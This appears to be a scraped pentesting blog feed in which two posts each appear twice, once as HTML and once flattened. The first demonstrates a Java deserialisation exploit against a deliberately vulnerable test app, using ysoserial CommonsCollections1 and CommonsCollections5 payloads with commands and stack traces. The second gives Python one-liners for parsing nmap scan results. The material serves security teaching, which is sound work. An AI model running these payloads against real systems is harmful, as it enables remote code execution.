payloads which make use of a wide variety of commonly used Java libraries in order to fulfill their goals. The CommonsCollection1 payload is one of those targeting the CommonsCollections 3 branch.<br/><br/>This was a little frustrating, because I had used this exact payload multiple times in the past on pentests with great success. Some further investigation was required, to figure out what was happening here.<br/><br/>During some testing on my local system, using a very simple vulnerable test application, I found that the payloads did not seem to work when run against Java apps executed on Oracle Java 1.8u91 but worked fine on Oracle Java 1.7u80. <br/><br/>Here's the vulnerable Java code, "SerializeTest.java", I was using for testing, which takes a single input parameter of a filename, then reads the contents of that file and tries to deserialise it. The code makes reference to the Java Commons Collection library, which will provide the ability for us to use the appropriate versions of the Commons Collection payloads from ysoserial to exploit this application, as long as the matching vulnerable version of the Commons Collections library is on the applications class path when we run it. <br/><br/><pre class="prettyprint">import java.io.ObjectInputStream;<br/>import java.io.ByteArrayInputStream;<br/>import java.nio.file.Files;<br/>import java.nio.file.Path;<br/>import java.nio.file.Paths;<br/>import java.io.InputStream;<br/>import org.apache.commons.collections.*;<br/> <br/>public class SerializeTest{<br/> public static void main(String args[]) throws Exception{<br/> Bag bag = new HashBag();<br/> Path path = Paths.get(args[0]);<br/> byte[] data = Files.readAllBytes(path);<br/> InputStream d = new ByteArrayInputStream(data);<br/> ObjectInputStream ois = new ObjectInputStream(d);<br/> ois.readObject();<br/> }<br/>}<br/></pre><br/><br/>I have included the command output showing the result of my testing below. During the testing, I create a file with malicious serialised Java data at /tmp/CommonsCollections1.bin with ysoserial, then try and read it with my vulnerable Java app using different versions of the Java runtime.<br/><br/>The following command creates a CommonsCollection1 payload file. This payload should create the file /tmp/pwned if deserialised by a Java application that has a vulnerable version of the Apache Commons Collections 3.x library on the class path.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > /tmp/CommonsCollections1.bin<br/></pre><br/><br/>Now, we try and read that payload file using our vulnerable Java application, via running it with the default Java JRE on my machine, which happens to be Java 1.8.0_91. The expectation is that this will work, and run our payload, creating file /tmp/pwned. When running the application, I have set the class path to point to a copy of the Commons Collections 3.2 library.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -version<br/>java version "1.8.0_91"<br/>Java(TM) SE Runtime Environment (build 1.8.0_91-b14)<br/>Java HotSpot(TM) 64-Bit Server VM (build 25.91-b14, mixed mode)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin <br/>Exception in thread "main" java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet<br/> at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)<br/> at com.sun.proxy.$Proxy0.entrySet(Unknown Source)<br/> at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)<br/> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)<br/> at java.lang.reflect.Method.invoke(Method.java:498)<br/> at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)<br/> at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)<br/> at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)<br/> at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)<br/> at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)<br/> at SerializeTest.main(SerializeTest.java:17)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned<br/>ls: cannot access '/tmp/pwned': No such file or directory<br/></pre><br/><br/>The file /tmp/pwned doesn't exist. Strange. Lets try running the vulnerable application using an older version of Java. <br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -version<br/>java version "1.7.0_80"<br/>Java(TM) SE Runtime Environment (build 1.7.0_80-b15)<br/>Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin <br/>Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set<br/> at com.sun.proxy.$Proxy0.entrySet(Unknown Source)<br/> at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)<br/> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)<br/> at java.lang.reflect.Method.invoke(Method.java:606)<br/> at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)<br/> at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893)<br/> at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798)<br/> at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)<br/> at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)<br/> at SerializeTest.main(SerializeTest.java:17)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned<br/>/tmp/pwned<br/></pre><br/><br/>OK, that worked - /tmp/pwned exists, proof of pwnage. Same Java application, same malicious serialized payload, same vulnerable version of Commons Collections library - the only thing different between these two exploitation attempts is the version of the JRE being used to run the vulnerable app. Note the different Java error messages produced via the two executions of that program. The second error is an expected error, the first however is not. Some Googling for the "java.lang.Override missing element" Java "bad" error I was receiving led me to <a href="https://github.com/frohoff/ysoserial/issues/17">this issue</a> on the ysoserial tracker on GitHub (and yes, I probably should have just checked there before the hours of testing). <br/><br/>So, some changes made to the VM in December last year, in JRE 8u72 just after the Java deserialisation attack blew up in the security community with the <a href="https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">Floxglove security post</a>, appear to be breaking this gadget chain. Is there a way around this so we can get our sploit on? As it turns out, the answer is yes. <a href="https://github.com/frohoff/ysoserial/pull/26">A workaround</a> has been added to the ysoserial 0.0.5 snapshot branch on github.<br/><br/>Grab the latest snapshot of ysoserial via git, and build it using Maven like so.<br/><br/><pre class="code">mvn -DskipTests clean package<br/></pre><br/><br/>This will create a 0.0.5 snapshot version of ysoserial. Then, build an exploit using the CommonCollections5 payload.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'touch /tmp/pwned2.0' > /tmp/CommonsCollections5.bin <br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections5.bin <br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned2.0 <br/>/tmp/pwned2.0<br/></pre>Stephen BradshawRecently, while trying to exploit a Java app vulnerable to a deserialisation attack, I was having some issues getting the CommonsCollections1 payload from ysoerial working. In case you're not familiar with this, essentially the <=3.2.1 versions of the Apache Commons Collections library can be used to create an attack payload of Java serialized data that can be used to execute local commands on systems running Java applications that deserialize untrusted attacker supplied content. The ysoserial tool enables an attacker to create a number of different serialized Java attack payloads which make use of a wide variety of commonly used Java libraries in order to fulfill their goals. The CommonsCollection1 payload is one of those targeting the CommonsCollections 3 branch.This was a little frustrating, because I had used this exact payload multiple times in the past on pentests with great success. Some further investigation was required, to figure out what was happening here.During some testing on my local system, using a very simple vulnerable test application, I found that the payloads did not seem to work when run against Java apps executed on Oracle Java 1.8u91 but worked fine on Oracle Java 1.7u80. Here's the vulnerable Java code, "SerializeTest.java", I was using for testing, which takes a single input parameter of a filename, then reads the contents of that file and tries to deserialise it. The code makes reference to the Java Commons Collection library, which will provide the ability for us to use the appropriate versions of the Commons Collection payloads from ysoserial to exploit this application, as long as the matching vulnerable version of the Commons Collections library is on the applications class path when we run it. import java.io.ObjectInputStream;import java.io.ByteArrayInputStream;import java.nio.file.Files;import java.nio.file.Path;import java.nio.file.Paths;import java.io.InputStream;import org.apache.commons.collections.*; public class SerializeTest{ public static void main(String args[]) throws Exception{ Bag bag = new HashBag(); Path path = Paths.get(args[0]); byte[] data = Files.readAllBytes(path); InputStream d = new ByteArrayInputStream(data); ObjectInputStream ois = new ObjectInputStream(d); ois.readObject(); }}I have included the command output showing the result of my testing below. During the testing, I create a file with malicious serialised Java data at /tmp/CommonsCollections1.bin with ysoserial, then try and read it with my vulnerable Java app using different versions of the Java runtime.The following command creates a CommonsCollection1 payload file. This payload should create the file /tmp/pwned if deserialised by a Java application that has a vulnerable version of the Apache Commons Collections 3.x library on the class path.stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > /tmp/CommonsCollections1.binNow, we try and read that payload file using our vulnerable Java application, via running it with the default Java JRE on my machine, which happens to be Java 1.8.0_91. The expectation is that this will work, and run our payload, creating file /tmp/pwned. When running the application, I have set the class path to point to a copy of the Commons Collections 3.2 library.stephen@ubuntu:~/workspace/SerializeTest/bin$ java -versionjava version "1.8.0_91"Java(TM) SE Runtime Environment (build 1.8.0_91-b14)Java HotSpot(TM) 64-Bit Server VM (build 25.91-b14, mixed mode)stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin Exception in thread "main" java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81) at com.sun.proxy.$Proxy0.entrySet(Unknown Source) at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058) at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373) at SerializeTest.main(SerializeTest.java:17)stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwnedls: cannot access '/tmp/pwned': No such file or directoryThe file /tmp/pwned doesn't exist. Strange. Lets try running the vulnerable application using an older version of Java. stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -versionjava version "1.7.0_80"Java(TM) SE Runtime Environment (build 1.7.0_80-b15)Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode)stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set at com.sun.proxy.$Proxy0.entrySet(Unknown Source) at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:606) at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) at SerializeTest.main(SerializeTest.java:17)stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned/tmp/pwnedOK, that worked - /tmp/pwned exists, proof of pwnage. Same Java application, same malicious serialized payload, same vulnerable version of Commons Collections library - the only thing different between these two exploitation attempts is the version of the JRE being used to run the vulnerable app. Note the different Java error messages produced via the two executions of that program. The second error is an expected error, the first however is not. Some Googling for the "java.lang.Override missing element" Java "bad" error I was receiving led me to this issue on the ysoserial tracker on GitHub (and yes, I probably should have just checked there before the hours of testing). So, some changes made to the VM in December last year, in JRE 8u72 just after the Java deserialisation attack blew up in the security community with the Floxglove security post, appear to be breaking this gadget chain. Is there a way around this so we can get our sploit on? As it turns out, the answer is yes. A workaround has been added to the ysoserial 0.0.5 snapshot branch on github.Grab the latest snapshot of ysoserial via git, and build it using Maven like so.mvn -DskipTests clean packageThis will create a 0.0.5 snapshot version of ysoserial. Then, build an exploit using the CommonCollections5 payload.stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'touch /tmp/pwned2.0' > /tmp/CommonsCollections5.bin stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections5.bin stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned2.0 /tmp/pwned2.0List comprehension one liners to extract info from nmap scans using Python and libnmap2016-04-30T13:37:00+00:002016-04-30T13:37:00+00:00/2016/04/30/list-comprehension-one-liners-to<br/>When I perform internal penetration tests where a large number of hosts and services are involved, its useful to be able to quickly extract certain sets of information in an automated fashion from nmap scan data. This is useful for performing automated tests against various service types, such as directory brute forcing on web servers, SSL/TLS cipher and protocol testing on SSL/TLS servers, and other targeted tests on various particular products or protocols.<br/><br/>I do a lot of my processing during a pentest either from IPython or the *nix shell, so being able to access this information from Python, where I can directly use it in scripts, the REPL or write it to disk to access using shell commands is extremely useful.<br/><br/>To this end, the <a href="https://pypi.python.org/pypi/python-libnmap">libnmap</a> library proves extremely useful. This post will cover a number of list comprehension "one liners" that can be used with the aid of the NmapParser library from libnmap to populate this information into a Python environment, where it can then be easily used for other purposes such as running a loop of other actions, or writing it to disk in a text file.<br/><br/>This is largely for my own use, so I don't forget these techniques, but hopefully other people find this useful as well. I'm hoping that this post does more than just give you a list of code to copy and paste, and also gives you an appreciation about how useful IPython is as a data processing tool for Pentesting.<br/><br/>I may add to this post in future if I have other commonly used patterns that I think would be useful.<br/><br/><br/><h3>Setup</h3><br/>The first step in being able to parse nmap scan data, is doing an nmap scan. I wont go into too much detail about how this is done, but to use the code in this post you will need to have saved your scan results to an xml file (options -oX or -oA) and have performed service detection (-sV) and run scripts (-sC) on the open ports.<br/><br/>The rest of the commands in this post will assume you are working from a Python REPL environment such as <a href="https://ipython.org/">IPython</a>, and have installed the libnmap module (which you can do using easy_install or pip).<br/><br/>To start off with, you need to setup the environment, by importing the NmapParser module and then reading in your xml scan results file (named "up_hosts_all_ports_fullscan.xml" which is located in the present working directory in the example below).<br/><br/><pre class="code">from libnmap.parser import NmapParser<br/>nmap_report = NmapParser.parse_fromfile('up_hosts_all_ports_fullscan.xml')</pre><br/><br/>The rest of this post will cover various one lines that will generate lists with various useful groupings of information. The examples all assume that the nmap scan data resides in a variable named nmap_report, as generated in the example above. The base list comprehension lines are given in the examples below, and if you paste these directly into the IPython REPL in which you have already run the instructions above, it will dump the output directly to the console so you can view it. I usually always do this first before taking other steps so I can determine the data "looks" as expected. <br/><br/>Then, you can optionally preface these lines with a variable name and equals "=" sign to assign the data to a variable so you can use it in future Python code, or surround it with a join and a write to save it to disk so you can work on it with shell commands. You could also paste the snippets into a Python script if its something you might want to use multiple times, or if you want to incorporate some more complex logic that would become awkward in a REPL environment. I'll include a section at the end that shows you how to quickly perform these operations. <br/><br/><br/><h3>Port information</h3><b>Hosts with a given open port</b><br/><br/>Show all hosts that have a given port open. Generates a list of host addresses as strings. Port 443 is used in the example below, change this to your desired value.<br/><br/><pre class="code">[ a.address for a in nmap_report.hosts if (a.get_open_ports()) and 443 in [b[0] for b in a.get_open_ports()] ]</pre><br/><br/><b>Unique port numbers found open</b><br/><br/><br/>Show a unique list of the port numbers that are open on various hosts. Generates a list of port numbers, as ints, sorted numerically. <br/><br/><pre class="code">sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]), key=int)</pre><br/><br/><b>Hosts serving each open port, grouped by port</b><br/><br/>Show all open ports and the hosts that have them open, grouped by port and sorted by port order. Generates a list of lists, where the first item of each member list is the port number as an int, and the second item is a list of the IP addresses as strings that have that port open.<br/><br/><pre class="code">[ [a, [ b.address for b in nmap_report.hosts for c in b.get_open_ports() if a==c[0] ] ] for a in sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]),key=int) ]</pre><br/><br/><h3>SSL/TLS and HTTP/HTTPS</h3><b>Host and port combinations with SSL</b><br/><br/>Show all host and port combinations with SSL/TLS. This works by looking for any reference to the service being tunneled over "ssl" or the script result including results that reference a pem certificate. Generates a list of lists, where each list item includes the host address as a string, and the port as an int.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/>The following includes the same information as the above, a list of all SSL enabled host and port combinations except as opposed to a list of lists, I have used the join function to create a list of host:port strings. <br/><br/><pre class="code">[ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/><b>Host and port combinations serving websites</b><br/><br/>Show all websites, including the port and protocol (http or https). This generates a list of lists, where each child list contains the protocol as a string, address as a string and port number as an int. There is some inconsistency in the way that nmap reports on https sites (sometimes the service is "https", and other times the service is "http" with an "ssl" tunnel), so I have performed some munging of field data to make the output here consistent.<br/><br/><pre class="code">[ [(b.service + b.tunnel).replace('sl',''), a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/>Here is the same information as the above, but instead of a list of lists with protocol, host and port as separate items, it joins all these together to provide list of URLs as strings.<br/><br/><pre class="code">[ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/><h3>Other Service Information</h3><b>Unidentified services</b><br/><br/>Show all of the services that nmap could not identify during its service enumeration. Generates a list of lists where each child list contains the address as a string, the port as an int, and the nmap service fingerprint as a string. I usually like to generate this information for manual review of those particular services, and don't do anything automated with the output, but its still nice to be able to quickly generate this information for easy review.<br/><br/><pre class="code">[ [ a.address, b.port, b.servicefp ] for a in nmap_report.hosts for b in a.services if (b.service =='unknown' or b.servicefp) and b.port in [c[0] for c in a.get_open_ports()] ]</pre><br/><br/><b>Software products identified by nmap</b><br/><br/>Show a unique list of the products that nmap identified during the scan. Generates a sorted list of strings for each product.<br/><br/><pre class="code">sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner]))</pre><br/><br/><b>Host and port combinations serving software products, grouped by product</b><br/><br/>Show each software product, with hosts and ports where they are served, grouped by product. Generates a list of lists, where each child has a first element of the product name as a string, followed by a list of lists, where each child list contains the address as a string, and the port number as an int.<br/><br/><pre class="code">[ [ a, [ [b.address, c.port] for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]</pre><br/><br/>Same as the above, shows each product, with hosts and ports where they are enabled, grouped by product, but with a slightly different presentation. This generates a list of lists, the first element in each list is the product name as a string, the second element is a list of host:ports as strings.<br/><br/><pre class="code">[ [ a, [ ':'.join([b.address, str(c.port)]) for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]</pre><br/><br/><b>Host and port combinations serving services relating to a particular search string</b><br/><br/>Show all the hosts and ports that relate to a given (case sensitive) search string, which can be found anywhere in a raw text dump of all the service information provided by nmap, covering the product name, the service name, etc. The string "Oracle" is used in the example below. Can be used to create a more generalised, or alternatively more specific grouping of services than the snippet above. Generates a list of lists, where each child list contains the address of a host as a string and the port as an int.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'Oracle' in str(b.get_dict()) + str(b.scripts_results) ]</pre><br/><br/>Shows the same as the above, all host and port combinations that match a given search string, but in this case its modified to match against a service information dump that's all in lower case. Use lower case search strings here (the example is a lower case "oracle"). Generates output in the same format as the example above.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'oracle' in (str(b.get_dict()) + str(b.scripts_results)).lower() ]</pre><br/><br/><h3>Random Stuff</h3><b>Common Name from Certificate Subject</b><br/><br/>Shows the common name field from any SSL certificates found and parsed by nmap during a script scan. Can be useful to determine the systems host name if you only started with an IP Address and reverse DNS doesnt work. Generates a list of lists, each containing the IP address and extracted host name as strings.<br/><br/><pre class="code">[ [a.address, c['elements']['subject']['commonName'] ] for a in nmap_report.hosts for b in a.services for c in b.scripts_results if c.has_key('elements') and c['elements'].has_key('subject') ]</pre><br/><br/><h3>Ways to use the results</h3>As mentioned earlier, the examples above, when pasted into your IPython REPL, will just dump the output to screen, where you can look at it. That's nice, cause it allows you to see the data you're interested in, ensure it passes the "smell" test, etc, but you probably want to do other stuff with it as well. One of the benefits of generating the information above in this way is that you can easily perform some further automated action with the result. <br/><br/>If you're already familiar with Python, it will be pretty easy for you to perform these other types of tasks, and you can skip this section, but for those who are not, this section will provide some basic pointers on how you can make use of these snippets. The examples below will demonstrate some simple examples of the things that you might want to do with them.<br/><br/><br/><b>Saving to disk</b><br/><br/>If you want to write the output of one of the snippets to disk to a text file, you need to join the list together in an appropriate string format (depending on your use case) and then actually write it out to a file. In Python, we can join the list to a string using the join function, and write it to disk using open and write. Here's an example.<br/><br/>Lets say we want to take our generated list of hosts and ports that support ssl, and pass them out to a newline separated file so we can do a for loop in bash and test each combination for secure ssl usage using a command line tool (are the ciphers correct, are there bad protocols like ssl3 or 3, etc). I would do all of this in a giant one liner in IPython, because that's the sort of thing that amuses me, but I will break it down into individual lines of code here for readability in this example.<br/><br/>Our list comprehension, that generates a list of host:port strings from above, is as follows. Note how we use the str function around the port number to convert it to a string from an int to allow it to be joined together with other strings. This is something to be aware of when manipulating this sort of data like this, and was something that caught me out a lot when I was first learning to use Python. <br/><br/><pre class="code">[ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/>Lets assign it to a variable named "ssl_services" to make it easier to work with.<br/><br/><pre class="code">ssl_services = [ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ] </pre><br/><br/>Now, lets join each list element together with newlines ('\n'), using Pythons join function, and assign it to a new variable, "ssl_services_text".<br/><br/><pre class="code">ssl_services_text = '\n'.join(ssl_services)</pre><br/><br/>Now, we can create a new file "ssl_services_file.txt" in the present working directory, and write the contents of our ssl_services_text variable to it.<br/><br/><pre class="code">open('ssl_services_file.txt','w').write(ssl_services_text)</pre><br/><br/>Easy. Now you can bash away at the file to your hearts content.<br/><br/><br/><b>Using with other Python code</b><br/><br/>Perhaps you want to use the list comprehensions above in other Python code? That's easy too. Here's a simple example, where we will loop through each of our websites identified from nmap, and see the result of requesting a particular page from that site.<br/><br/>Here's the list comprehension that generates the list of URLs. We will assign it directly to a variable called "urls".<br/><br/><pre class="code">urls = [ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/>Next, we do some prep work, and import the <a href="http://docs.python-requests.org/en/master/">requests </a>module and setup a simple helper function that makes a web request and saves the result to file on disk with an autogenerated name based on the url. You will note below that the get request uses the "verify=False" option, which ignores certificate validation errors when making the request, something that's often necessary when testing internally on machines that may not trust the certificate authorities used to sign SSL certificates.<br/><br/><pre class="code">import requests<br/><br/>def getAndSave(url):<br/> r = requests.get(url, verify=False)<br/> open('_'.join(url.split('/')[2:]).replace(':',''),'wb').write(r.text.encode('utf8'))<br/></pre><br/><br/>Now, we will add some code to iterate through each of the base URLs from nmap, and requests the robots.txt file for each site so that it can be saved to disk for our later perusal.<br/><br/><pre class="code">for a in urls:<br/> getAndSave(a + 'robots.txt')</pre><br/><br/>This will request each the robots.txt from each of the sites in turn, and save it to disk in the current working directory. This is just a very simple example (there's not even any error checking in the getAndSave function, but it hopefully gives you an idea of whats possible.<br/><br/><h3>Conclusion</h3>Hope you found this useful, and that it gave you an appreciation of how useful and flexible Python can be when parsing nmap scan data.<br/><br/>Are there any other common tasks you perform with nmap scan data that you would like a one-liner for? Leave a comment!Stephen BradshawWhen I perform internal penetration tests where a large number of hosts and services are involved, its useful to be able to quickly extract certain sets of information in an automated fashion from nmap scan data. This is useful for performing automated tests against various service types, such as directory brute forcing on web servers, SSL/TLS cipher and protocol testing on SSL/TLS servers, and other targeted tests on various particular products or protocols.I do a lot of my processing during a pentest either from IPython or the *nix shell, so being able to access this information from Python, where I can directly use it in scripts, the REPL or write it to disk to access using shell commands is extremely useful.To this end, the libnmap library proves extremely useful. This post will cover a number of list comprehension "one liners" that can be used with the aid of the NmapParser library from libnmap to populate this information into a Python environment, where it can then be easily used for other purposes such as running a loop of other actions, or writing it to disk in a text file.This is largely for my own use, so I don't forget these techniques, but hopefully other people find this useful as well. I'm hoping that this post does more than just give you a list of code to copy and paste, and also gives you an appreciation about how useful IPython is as a data processing tool for Pentesting.I may add to this post in future if I have other commonly used patterns that I think would be useful.SetupThe first step in being able to parse nmap scan data, is doing an nmap scan. I wont go into too much detail about how this is done, but to use the code in this post you will need to have saved your scan results to an xml file (options -oX or -oA) and have performed service detection (-sV) and run scripts (-sC) on the open ports.The rest of the commands in this post will assume you are working from a Python REPL environment such as IPython, and have installed the libnmap module (which you can do using easy_install or pip).To start off with, you need to setup the environment, by importing the NmapParser module and then reading in your xml scan results file (named "up_hosts_all_ports_fullscan.xml" which is located in the present working directory in the example below).from libnmap.parser import NmapParsernmap_report = NmapParser.parse_fromfile('up_hosts_all_ports_fullscan.xml')The rest of this post will cover various one lines that will generate lists with various useful groupings of information. The examples all assume that the nmap scan data resides in a variable named nmap_report, as generated in the example above. The base list comprehension lines are given in the examples below, and if you paste these directly into the IPython REPL in which you have already run the instructions above, it will dump the output directly to the console so you can view it. I usually always do this first before taking other steps so I can determine the data "looks" as expected. Then, you can optionally preface these lines with a variable name and equals "=" sign to assign the data to a variable so you can use it in future Python code, or surround it with a join and a write to save it to disk so you can work on it with shell commands. You could also paste the snippets into a Python script if its something you might want to use multiple times, or if you want to incorporate some more complex logic that would become awkward in a REPL environment. I'll include a section at the end that shows you how to quickly perform these operations. Port informationHosts with a given open portShow all hosts that have a given port open. Generates a list of host addresses as strings. Port 443 is used in the example below, change this to your desired value.[ a.address for a in nmap_report.hosts if (a.get_open_ports()) and 443 in [b[0] for b in a.get_open_ports()] ]Unique port numbers found openShow a unique list of the port numbers that are open on various hosts. Generates a list of port numbers, as ints, sorted numerically. sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]), key=int)Hosts serving each open port, grouped by portShow all open ports and the hosts that have them open, grouped by port and sorted by port order. Generates a list of lists, where the first item of each member list is the port number as an int, and the second item is a list of the IP addresses as strings that have that port open.[ [a, [ b.address for b in nmap_report.hosts for c in b.get_open_ports() if a==c[0] ] ] for a in sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]),key=int) ]SSL/TLS and HTTP/HTTPSHost and port combinations with SSLShow all host and port combinations with SSL/TLS. This works by looking for any reference to the service being tunneled over "ssl" or the script result including results that reference a pem certificate. Generates a list of lists, where each list item includes the host address as a string, and the port as an int.[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]The following includes the same information as the above, a list of all SSL enabled host and port combinations except as opposed to a list of lists, I have used the join function to create a list of host:port strings. [ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]Host and port combinations serving websitesShow all websites, including the port and protocol (http or https). This generates a list of lists, where each child list contains the protocol as a string, address as a string and port number as an int. There is some inconsistency in the way that nmap reports on https sites (sometimes the service is "https", and other times the service is "http" with an "ssl" tunnel), so I have performed some munging of field data to make the output here consistent.[ [(b.service + b.tunnel).replace('sl',''), a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]Here is the same information as the above, but instead of a list of lists with protocol, host and port as separate items, it joins all these together to provide list of URLs as strings.[ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]Other Service InformationUnidentified servicesShow all of the services that nmap could not identify during its service enumeration. Generates a list of lists where each child list contains the address as a string, the port as an int, and the nmap service fingerprint as a string. I usually like to generate this information for manual review of those particular services, and don't do anything automated with the output, but its still nice to be able to quickly generate this information for easy review.[ [ a.address, b.port, b.servicefp ] for a in nmap_report.hosts for b in a.services if (b.service =='unknown' or 